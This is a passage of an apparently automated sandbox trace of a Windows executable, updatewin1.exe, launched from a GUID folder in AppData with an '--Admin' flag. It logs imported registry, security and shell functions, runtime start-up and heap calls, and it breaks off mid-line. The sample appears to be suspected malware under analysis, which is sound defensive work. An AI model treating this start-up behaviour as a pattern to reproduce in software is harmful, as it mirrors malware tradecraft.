(hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0081.101] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0081.101] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0081.101] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0081.101] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0081.101] GetProcAddress (hModule=0x754b0000, lpProcName="RegCreateKeyExW") returned 0x754c40fe [0081.101] GetProcAddress (hModule=0x754b0000, lpProcName="SetSecurityDescriptorDacl") returned 0x754c415e [0081.101] GetProcAddress (hModule=0x754b0000, lpProcName="InitializeSecurityDescriptor") returned 0x754c4620 [0081.101] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0081.101] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0081.102] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0081.102] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0081.102] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0081.102] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0081.102] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0081.102] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0081.102] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0081.102] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743e0000 [0081.107] GetProcAddress (hModule=0x743e0000, lpProcName="atexit") returned 0x743fc544 [0081.107] atexit (param_1=0x4f63e0) returned 0 [0081.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x9f8163a0, dwHighDateTime=0x1d5d6b4)) [0081.110] GetCurrentThreadId () returned 0x9d4 [0081.110] GetCurrentProcessId () returned 0x9c4 [0081.110] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=22239298289) returned 1 [0081.120] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0081.121] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.121] GetLastError () returned 0x57 [0081.122] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.122] GetLastError () returned 0x57 [0081.122] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0081.122] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0081.122] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.122] GetLastError () returned 0x57 [0081.122] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0081.122] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0081.125] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.125] GetLastError () returned 0x57 [0081.125] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.125] GetLastError () returned 0x57 [0081.125] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0081.125] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0081.125] GetProcessHeap () returned 0x4e0000 [0081.125] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.125] GetLastError () returned 0x57 [0081.125] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0081.125] GetLastError () returned 0x57 [0081.126] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0081.126] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x364) returned 0x50a9f0 [0081.126] SetLastError (dwErrCode=0x57) [0081.127] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xc00) returned 0x50ad60 [0081.128] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0xb39dd2dc, hStdError=0xfffffffe)) [0081.128] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0081.128] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0081.128] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0081.128] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" --Admin" [0081.128] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" --Admin" [0081.128] IsValidCodePage (CodePage=0x4e4) returned 1 [0081.128] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0081.128] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0081.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.129] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0081.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0081.130] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.130] GetLastError () returned 0x57 [0081.130] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0081.130] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0081.130] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0081.130] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04wijHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0081.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.130] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0081.130] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0081.130] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04wijHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0081.130] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x80) returned 0x50a0d8 [0081.130] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe")) returned 0x5f [0081.130] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xdc) returned 0x50c168 [0081.130] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0081.130] GetLastError () returned 0x0 [0081.131] GetEnvironmentStringsW () returned 0x50c250* [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xaca) returned 0x50cd28 [0081.131] FreeEnvironmentStringsW (penv=0x50c250) returned 1 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x98) returned 0x50c250 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3e) returned 0x50c2f0 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x6c) returned 0x50c338 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x6e) returned 0x50c3b0 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x78) returned 0x4f1188 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x50c428 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f52d8 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x50c498 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x28) returned 0x50a160 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1a) returned 0x50bd18 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4a) returned 0x50c4e8 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x72) returned 0x4f1208 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f5310 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f5348 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1c) returned 0x50bd40 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xd2) returned 0x50c540 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x7c) returned 0x50c620 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x50c6a8 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3a) returned 0x50c6e8 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x90) returned 0x50c730 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x50c7c8 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f5380 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x50c7f8 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x50c838 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x50c888 [0081.131] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x50d818 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x82) returned 0x50c8e8 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f53b8 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1e) returned 0x50bd68 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2c) returned 0x4f53f0 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x50c978 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x50c9d8 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2a) returned 0x4f5428 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x50d860 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x50ca38 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x50ca98 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f5460 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x8c) returned 0x50cac8 [0081.132] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50cd28 | out: hHeap=0x4e0000) returned 1 [0081.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x800) returned 0x50cb60 [0081.133] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0081.133] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0081.187] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0081.188] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS 